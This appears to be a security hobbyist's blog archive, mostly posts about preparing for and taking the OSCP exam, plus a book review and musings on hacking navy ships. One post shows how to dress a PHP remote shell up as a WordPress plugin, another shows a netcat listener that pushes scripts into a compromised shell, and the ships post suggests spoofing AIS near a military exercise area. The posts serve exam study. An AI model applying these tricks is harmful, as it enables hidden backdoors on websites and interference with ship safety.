OSCP: The chain to loot

piratSo you want to be a super evil pirate ninja leet hax0r ??

Well seems so, because even after I finished my oscp I still get some dm in the oscp forums and even direct email about “ Well my exam is tomorrow .. plz help”.

 

Well so you want the evil super s3crät l00t ? So you need to know the super s3cr3t sectret:

 

The Exploit chain.

piratteile

The chain consist out of the following links:

The exploit

The recon

The delivery

The payload

The receiver

 

Let’s talk about the solitary pieces of the chain, shall we ?

The exploit

Well everybody is always crazed out about this super evil 0days.

So you are a super script kiddie who got a mad super s3crit exploit from his friends in this dark irc channel and owns now 1000 shells around the world. Great could you please step in this corner over there ? Great .. so you are this super pro nsa hacker with his pre packed ethernalblue exploit .. great step also in the corner … Ohh so you are one of this elitist guys from the offsec irc preaching that using metasploit is bad and only handcrafted manual exploits from your grandma are the real deal . .well you know where the corner is.

We don’t care about the exploit in this article .. because if you master the rest of the chain the exploit is the most unimportant piece of all. It is the weakest link of our chain. A exploit can and will fail, after all you are using a buffer overflow or some other bug in your targets software. So you are quite likely to crash or break something. If the rest of your chain is not secure well .. no shell for you.

 

The recon

 

Let’s use a Lego analogy again: You say you want a Lego brick. Great which of the 51k possible different types do you want ? https://www.bricklink.com/catalogTree.asp?itemType=P&itemBrand=1000  That is the reason why I made so much fun in the exploit part, imagine how much different configurations a international company with different offices around the globe has ? I bet more than a easy 51k possible versions 😉 So any more information you can get makes the job easier. So if you say a gray piece I could ask you wich type of gray https://www.bricklink.com/catalogColors.asp?utm_content=subnav Light bluish gray, Dark Gray, Light gray etc etc 😉 Any information about the age of the piece ? Because different years had different types of gray (like say Windows or Linux OS have a release date, so if you know the version of say IIS or Apache you can tell which OS will be the most likely one). PROTIP: Make a list of Apache, IIS , Windows and Linux Versions and their release date. Quite handy now and then.

You can get more precise of course, so if you say slope 2×1 with a 2/3 cutout in light bluish gray .. well we are in business. Same with a precise version number of a software. Makes finding the right exploit easier. Or finding all hidden pages on a webserver, or even the Tomcat administration interface with the default password. Good precise recon is the key to a good chain to a shell. Any information you can present in a structured way makes your chain stronger.

 

The delivery

What do I mean with delivery ? Well you might have a cool RFI thing on that server you are attacking but if you can’t debug your own webserver and make sure that that super evil payload is actually delivered to the target. Or if you don’t deactivate all scripting on your server you might get another shell than the one you expected. So make sure you can debug all ways you want to deliver you payload to the target. Make sure you go through the upload filter or that your payload has the right format to be working in the website etc. Or that you have the right url encoding for your sql payload etc . Or if you use a exploit script you might want to make sure with wireshark or tcpdump that the exploit actually send something to the target. Make sure that you can take the stuff you want on the target to the target. If you can’t insure that you can have the fanciest vulnerability on a server if you can’t reach it.

The payload

Well you have a fancy exploit but you let the default payload in it and now calc.exe is open on your target. Great work. You might want to be able to pick the right payload for the target. Know the difference between staged or unstaged payloads are in msfvenom. If you are in the labs it might be a good idea to spent time with a working exploit in metasploit and try every payload on the target. Make a list which payload works best on which os. What ports are working most of the time because they are open on most firewalls ? Knowing how to debug a payload or use the payload to ping all the open ports etc. Make sure you can verify that a payload is working. Juggling to many unknowns  is a disaster. Have you ever tried to solve a math problem with 5 unknowns ? It is harder than solving y=2. Just saying that you should also be able to make sure that you can pick the right payload, the right port to connect back to you and be generally able to debug your payload.

The receiver

Well the receiving part is a chain link which is often overlooked by many people. But think about it: It would be really shameful if your firewall kills the incoming shell … wouldn’t it be ? So you should be able to debug your end of the connection. Also it is common to try to catch a encrypted payload connection with nc. It can be done but not with the default settings you might expect. There is a reason why I set up msf/exploit/multi/handler for every payload. This way I can have one thing all the time I can practice and debug and have a proven method of handling my shells without fear of nc crashing on the first attempt and me forgetting of restarting it again etc.

 

So that was my introduction to the magic chain to the loot.

 

As usual feel free to give me feedback.

 

Greetings ucki

 

Book Review Ayden‘s Choice (Nele Vonlanthen Book 1)

Now to something totally different .. a book review.

 

First a TRIGGER WARNING: If you are a person who tends to be triggered please don’t read the book or this review. Especially if you have problems with family violence and abuse. Really don’t read on in this case.

Link to the Website of the book: http://www.nelevonlanthen.com/

Let’s start with a little Disclaimer and then dive into the review. I got the book for free after I wrote that one of the comic panels on the twitter account to the book universe was not correct. I try to be honest while doing the review. I wouldn’t have bought the book, I normally read a lot but not from first time authors. I have had so many bad experiences with authors abandoning series, or writing bad stuff. If you watch Shads video https://www.youtube.com/watch?v=XF6yysxS5z8  you see there are many ways to screw up a book.

Just go to amazon and look for free ebooks. I did two literature mistakes in my life: First one reading most of Anne Rice because our crew got the idea to choose one author and then get all the books for a deployment. Second one was to grab a lot of free ebooks from amazon for my year of travel. So now I’m super picky with my reading. You could write a total „Mary Sue Type“ of story, you know the HERO is everything. You know Dragon Ball Style etc. Or if you are a fantasy author you could try to write EPIC. You know : „They rode their Blarf to the Gnarf to drink some Snayrf.“ Because riding horses and drinking beer is not epic enough. Or you can go the full Lord of the Rings style and frontload everything with some hundred pages of „world building“. Or you can have your epic story and are not able to get the epicenes over to your reader. Which is a problem if you want to build a epic series. You have to hook persons with the first book. And to be honest how many first books of a author or a series are out there which are really good ? I’m just rereading Terry Pratchett’s Discworld. To be honest he is my top 1 author. No questions asked. But the first „high fantasy“ books of the series are not really good.

Ayden‘s Choice is the first book in a world, if you look at the WEBSITE or on the twitter account you see that there are a lot of ideas still untold.

 

Sam Felix tried very hard to make a GOOD FIRST BOOK. And now I’m in a hard place. The book itself looks like a book for young adults / teenagers. Not to many pages, bigger font etc. Should I review it as a standalone young person’s book ? Should I review it as a part of a imaginary 60 Book series  ?

 

The writing and the pacing is good, which makes the book a good quick read, quite pleasing from the word crafting aspect. Not to many CYBER CYBER TECHNOBRABBEL, ok a „Use the power of the net“ pseudo fantasy lingo here and there. No Mary Sue Super Hero, good flow. So reading the book is not hard even for a person like me not being a native English speaker (who would have guessed with that bad writing 😉 )

But unfortunately the story part is another beast.

Basically Ayden’s choice is a introduction story in the „NELEVERSE“ and a origin story of Ayden. Like all the Batman and Spiderman you get a superhero origin story. With all the classical problems.

You might know WASP ? Well Lisbeth Salander from „the girl with the dragoons tattoo“ ?. You know, this super duper hacker, with the super bad family story coming out during the series ? Just imagine all the family problems in one book. 2/3 of the book are basically family abuse. Yepp just that beating and all the other bad stuff. So reading that was unpleasant even as a hacker, just knowing persons from bad family’s and not having the problems myself. So as a setup good versus bad this works quite good, to be honest too good. Well till the author had the idea to give the reader a glimpse into the mind of the villain. This works quite well if you have such a epic series like Game of Thrones. But unfortunately this is a short teenager book. So having to slog through 1/3 of the book with all the bad stuff happening just to get to the first action just to have the villain crumbling because of that is not very pleasant.  So basic story Ayden is in hell and the crew around Nele have to rescue him because he is also a hacker talent. And this is the point where the story exploded totally for me. I’m fine with slogging through a origin story even if it is such a unpleasing one. But to have such a super talented hacker crew (the author is trying to introduce them to us, super sleeper compartmentalized opsec galore crew, the social engineer is called deceptionalist) does such blunt errors hurts. They get their surveillance gear found, they never heard about signal proof bags (they are commodity hardware this days ,. rfid, mobile signal proof bags coming in duffel size now), never heard about door locks, safe driving etc. Actually the book is 2/3 family violence and abuse and around 1/3 one of this elite crew trying to fix the problems they had because of some screw up, just to finish the book with a mc guffin. And our hero leaves the book also looking like the last unforgiving asshole.  If you would spread out the story across some books, like Ayden remembering his backstory now and then and have some flashbacks and problems etc it would work. But in this way it is just hard and not very pleasant. Which is quite a pity. The writing etc is good, the idea, world and the comic are quite good. This has the chance to be better than Tom Clancy “Net and Cyber” book series. You know a realistic cool hacker book series. But because of this I really can’t recommend the book. Because I don’t know to whom. It is not a teenager-book, not a hacker book etc. While I look forward for more comics and also other books of this universe I think I can’t give it a 5 star review like the reviewers on amazon. Well that’s all for the first book review on this blog.

 

 

 

The thing about hacking ships

In the last time we saw two major accidents in the us navy. Well actually there was more but the media picked up on two: http://edition.cnn.com/2017/08/21/politics/navy-ships-accidents/index.html

While accidents happens all the time

(btw look for the signals, this is the pre photoshoped version 😉 ) the infosec twitter is full of OMG THE RUSSIANS HACKED GPS.

Lets have a look here .. DISCLAIMER: I spent 12 years in the german navy doing it-security and administration. I have a lot of „look what I found .. why are you crying skipper ?“ to my name I will talk broudly. Security etc … Hacking ships now is more a hobby form e than a job. Some of my infos might a bit outdated or purposefully wrong …

 

A short introduction in navigational systems:

 

Most of you will have just a basic understanding how a ship operates. Most ships will bhave distinctive systems, as a simplification we will categorise systems in this function groups:

  • Going to places ( machine scada systems etc)
  • Knowing where you are (ECDISC (chart system), GPS, other navigational aids)
  • Knowing where everybody else is (Radar, AIS)
  • Living on that thing
  • Mission package (Cruise ship systems or weapons etc)

 

And how hard is it to hack this types of systems ?

For the machine scada stuff, well it is super easy and we have proof oft hat (Stuxnet, @viss on t twitter). Well on a ship it is harder because we have no back channel and no permanent internet connection etc, but with a usb stick you could hack this.

 

For the System groups 4&5 we will disregard them for now. We want to hack on a broad scope.

 

The navigational aids are interessting to hack. ECDISC are certified systems, with a lot of known bugs, just look at this yt channel and try to spot all the old os versions , https://www.youtube.com/channel/UCDKFMaBHOmpnc-q6bn7kShw

GPS on the other hand is HARD. Not because of the P(Y) . encryption (btw no civilian signal no P(Y) bc of time dependencies, read up wiki) but because of physics. Spoofing is quite time sensitive, so while it is easy on a lab setting (and some universities did tests on ships) you need to be close to your target to overpower the sat on the antenna. If you jam from far away (low angle) your spoofing might not work. And since most ships have more than one reciever and one antenna it is quite annoying to spoof with a good reliability. Oh and when you can spoof, why waste it on some lousy destroyers in peace time ? Also low angle jamming would be picked up by electronic warfare systems with a good chance. And this would trigger a angry response of the kinetic type so not the best idea.

If I COULD spoof GPS without being close to the reciver I would sit in my evil bunker and lough about all the precision ammo flying past it in a war setting. to valuable in this setting to waste it for some dead sailors. Even as a test .. just grab one oft he many predator drones as a sample. Drones malfunction all the time so nobody would makle a big fuzz about it.

AIS and Radar, well Radar hacking or jamming is a thing, called electronic warfare. So proven concept. And AIS is not encripted or secure. You could imagine it more like a numberplate transponder. Nothing fancy. If you want to cause trouble with it just grab a sailboat sail close to a military exercise area and spoof some ships with a wrong GPS track inside oft he target area and watch them stop shooting. Nothing really hard. And while smuggler and military ships often operate without AIS it makes them stand out like hell on a radar pic, because a blip without AIS information = suspect.

 

And what happend , lets look at http://gcaptain.com/uss-john-s-mccain-collision-ais-animation-shows-tankers-track-during-collision/ If I look at thew damage pictures it looks like SOMEBODY tried to pass a high traffic area without looking left or right without sending AIS because OPSEC .. so maritime jaywalking. Just my idea .. but if I have to choose between hacking (wich is possible but a hassle and some idiotic „macho man“ manuver .. well my bet is on idiots 😉 )

 

Scripting the OSCP exam and getting some offsec swag

So in the last blog I hinted some other scripts. Now here is the full story:

Act 1: While I wrote my msfvenom wrapper a lot of people in our pritvate chat group started to make jokes about my scripting and that I would write uckivenom the next better metasploit. And chances was that my exam date was the 02.05 .. so one day after aprils fools day .. mmm let’s get to work. I wrote a little script muttering out nice random phrases and had some nice ASCII art.

maintroll1

Act 2: I started to hint the script roughly a week before aprils fools day (and had 2 other guys put in the picture) so we started to build some interest.

Act 3: The owner of the private channel got word and started to freak out because he was fearing offsec

maintroll15

Act 4: The people knowing that it was just a troll started to start some little riot in our party chat to get me back.

Act 5: I be back

maintroll18.png

Act 6: I put the script on the offsec forums on aprils fools day. It was gone in 5 min (and I started to freak out, bearing a ban one day before exam)

forum.png

Act 7: The forum post was back after 2h and normal students started to get fooled.

Act 8: After passing my exam I went to twitter and some friends congratulated me ^^ I mentioned the script and muts got wind.

twittermax.png

Act 9: Offsec swag !!!

troll1

OSCP and SPACESHIP – The final Review

Finally: SPAAAACCCEEESHIIIPP ahh yes and OSCP -Final Thoughts and review.

Ok guys finally after sitting on my shelf and collecting dust in the box for nearly 9 months it was finally time for the SPACESHIP SPACESHIP SPACESHIP !!! I bought it shortly before I did my first exam try (left over stock .. quite rare) to motivate me. You know saying to myself I will build it next week when I have my OSCP. Well didn’t work out that way. So last week finally I had the chance to build it.

spaceship-2

So finally I have my certification. Lets do the final review on the course. This will be a series of two blog posts. In this post I do the review and in the next one in the following days I will give an overview over my tools and cheat sheets I produced during my time in the labs.

spaceship-4

So to the review:

First off this certification is the one I’m most proud of. Not getting the naval officer qualifications to navigate warships (ok was a cool one) or my firefighter cert and other professional certifications. This cert is also the cert were I hated the experience most.

spaceship-1The point is OffSec is not a teaching company. They are a pentesting company offering some pentesting training. If you pay a teaching company you will get persons teaching you stuff, answering your questions and with a bit of luck you will leave the course with a cert and maybe you will learn some valuable lessons.

To paint a different picture: If offsec would offer swimming courses, they would drop you into a cold pool. In my first review I used the diving licence as a picture.

While I hate this type of teaching I value the lab so much. The cold pool so to say is a very nice one .

And for the teaching you have to learn for yourself. And I can only recommend to get some friends or other people around you (be it in real live or via the internet) to turn you in the right direction now and then. It might sound stupid but my new job helped. In our it sec department we have one guy with oscp and a bunch of people having failed to get it. This helps with the morale, after two failed attempts I was doubting myself. But realising that this cert is hard it helped a lot.

Overall I LOVE THE LABS !!! will resubscribe in the future to test and learn a bit more. And thanks to all the people chearing me up in real live and in the dark back rooms of the internet. Thanks a lot !!

Thanks offsec (and also thank you to give me the nice chance to troll you back with a nice aprils fools joke 😉 )

 

And if you go into the labs . .remember here be dragons

spaceship-5

#OSCP Turning your Backdoor in a WordPress Plugin

Just a quick one:

Imagine you own a wordpress and want to upload your remote php script as a nice fancy wordpress plugin. You know, just adding a feature the original installation doesn’t have. So you grab your trusty php remote shell script .. and wordpress hates it. Damm .. So how do  we build a valid wordpress plugin?

  1. Open up your php script and add

/*
Plugin Name: WordPress.org Plugin
Plugin URI:  https://developer.wordpress.org/plugins/the-basics/
Description: Basic WordPress Plugin Header Comment
Version:     20160911
Author:      WordPress.org
Author URI:  https://developer.wordpress.org/
License:     GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/

to the start, then upload it

2. ??????

3. Profit

 

Easy ^^

OSCP Exam, Episode II

exam-lego-2So how is a OSCP exam ??

Well as I blogged I failed the first time. This time I was pretty sure that my chance this time was a solid 50:50. I still had some problems with web apps (being from a infrastructure / paper background). So lets see how the day went: (Edited out the Machine Nrs etc out of my notes.

I was super cool for the start .. my time line: (local time)

11:00 start , some trouble with the vm … 11:15 in the network

exam-lego-1

12:25 25 points (you might now which 25 points .. not spoiling)

13:22 first look at machine

14:00 finished first look on another machine

exam-lego-4

14:16 Start Look at another Machine

14:42 finished the first look on another machine (the lowest points “easy box“)

 

16:25 Did Rotation 1 on a machine

17:08 Rotation 1 on a machine, got local shell … cursed a lot bc of local.txt

That moment you celebrate your local shell .. just to find no command line tool to get the contensts of the local proof file to the screen for the screenshot … ARGGGGGHHH

17:45-18:35 eating out with girl to get head clear .. looking good 35 points so far

19:32 Finished Rotation 1 on another machine

20:26 Rotation 2 on a machine

21:33 a Machine Rotation

-21:45 short Lego Building of http://zusammengebaut.com/wp-content/uploads/2017/01/lego-brickheadz-iron-man-41590.jpg to get the head clear

22:45 Rotation 2 on a machine

23:47 Derping around between machines

00:47 More Derping between machines -> local Shell on a medium box

45 Points so Far in 12,5 h

exam-lego-3

1:25 Priv Escalation Try on local shell a

2:10 Back to another machine

4:00 Stop derping on “easy box” .. easy machine is not easy

exam-lego-7

7:08 my notes getting blurry .. no cm gained …

exam-lego-8

around 9:00 2h left my girl gets up .. moode is down ..my VM starts to behave wierd, the laptop is going to overheat and I can’t copy and paste any longer between host and Kali .. a lot of manual typing …

exam-lego-5

10:00 deciding to call it a fail and take some sleep

13:00 sending in the failed report to get some feedback for the reporting template .. better know in advanced if something is missing for the next try

exam-lego-613:15 trying to get the dead animal out of my mouth and eat something

14:00 deciding to go back to the laptop to attack the lab with my last 4 lab days

15:00 still derping around watching youtube and building https://c1.staticflickr.com/1/778/32753576282_9ab8cf03b9_b.jpg

16:41 now (Blog first draft)

realising that my idea to take better notes than the first exam worked out 50% .. my handwriting still gets super bad with sleepyness .. a lot in my latex eport and x screenshots etc .. but will not help me if I get the same machines again …

1,5 Days later: Well after some thoughts .. well webapps broke my neck .. potential, to be honest I didn’t found any bugs on some of the machines. And the other machines, to be honest on a rel world test I would put them to the back of my list. A normal company often has that one corpse in the cellar. You know that xp system running your accounting software, or the NT server etc. In the lab you often have problems with compiling for older kernels .. well in the exam I had .. as the Thai say :” Same Same but Different”. Right now also questioning my strategy of switching between machines often … https://www.youtube.com/watch?v=TkraRj8uAYQ .. well might have some chats and will be do the exam with a better SOP in the near future 😉

Greetings Ucki

Quick tip: NC listener for the lazy

Ok, you have a shell but you want to have some cool scripts on the target to get cracking on .. well till now I just made a bunch of files with echo „bla bla“ > script.txt and copy pasted them line for line … well

If you set up your nc like this:

cat wget.sh |nc -lvp 443

It will just pipe all that nice echo lines into your command shell. So you have your scripts on the target.

Doh … so much time wasted ..

 

cheers ucki

Back to the labs .. again . .7 months later

Hello everybody reading this blog .. yeah I mean you .. you seem to be the only one .. so Hello again ..

It has been 7 months. What have I done in that time ?

Well I failed my first oscp exam.

Weak points: Windows priv escallation, and exploits .. sort of.

Then I spent my time in a lot of hotel rooms. Being a digital nomad sort of because of job. So I took a break from the labs. Right now I’m back in a better internet place (it is easier to get a good internet in some mountains in south america than in some fancy hotels) so I give that course a new shot.

If I will redo my recon scripts .. I’m unsure. Right now my recon procedure is :

1) run unicorn scan (so much faster .. .and also fast udp scan)

2) Run nmap only against the found ports of the target.

3) Write a lot of stuff down .. pen and paper style.

Ok right now I’m actually doing a lot of work in LaTex. Because I do every exercise in the manual. Like every tiny one. Because some of that tiny bits broke my neck in the first try

For LateX I use the lstlisting packet for copy paisting most of my outputs in my report (screenshots are nice but for my long term usage a copy paste ability is quite nice .. going back if you need to remember a certain command.

I’m using three colors to highlight stuff

moredelim=**[is][\color{codechanged}]{**@}{@**},
moredelim=**[is][\color{myblue}]{***@}{@***},
moredelim=**[is][\color{mygreen}]{*@}{@*},

As you can see I can make a red “change marker” as requested by offsec with **@TEXT@** or can make blue or green comments easy. I use green for comments of “official nature” while blue are for command line options and remarks for myself. If I decide not to include that text I might just turn that text invisible 😉 you know grey on grey.

Anyways so much for know .. see you guys in the lab

Greetings ucki

Back to the labs – everything is awesome

awesome.jpg

I didn’t blog for a while. There are some reasons for that ….

First I got a new job. Actually my first day was also my exam day. The original plan was to use my last money to take this course and hoping for the best. The new job keeps me occupied so I didn’t blog.

Second: I failed the exam. Well I wanted to blog about the exam. But it is hard without spoiling stuff.

Third: I actually did’t like the course … hated the “community” around it.

Today I take the plunge and returned to the labs.

And to sing the catchy Lego Movie Song: “EVERYTHING IS AWESOME”

Why did I go from being grumpy to being happy ?? Well actually g0tm1lk posted a AWESOME thread in the forums about methodology.

And I was introduced to the OWASP framework while working. So right now I have 2 good procedures t learn from. Nice.

And my way to work actually passes the LEGO shop ^^

So just sing along …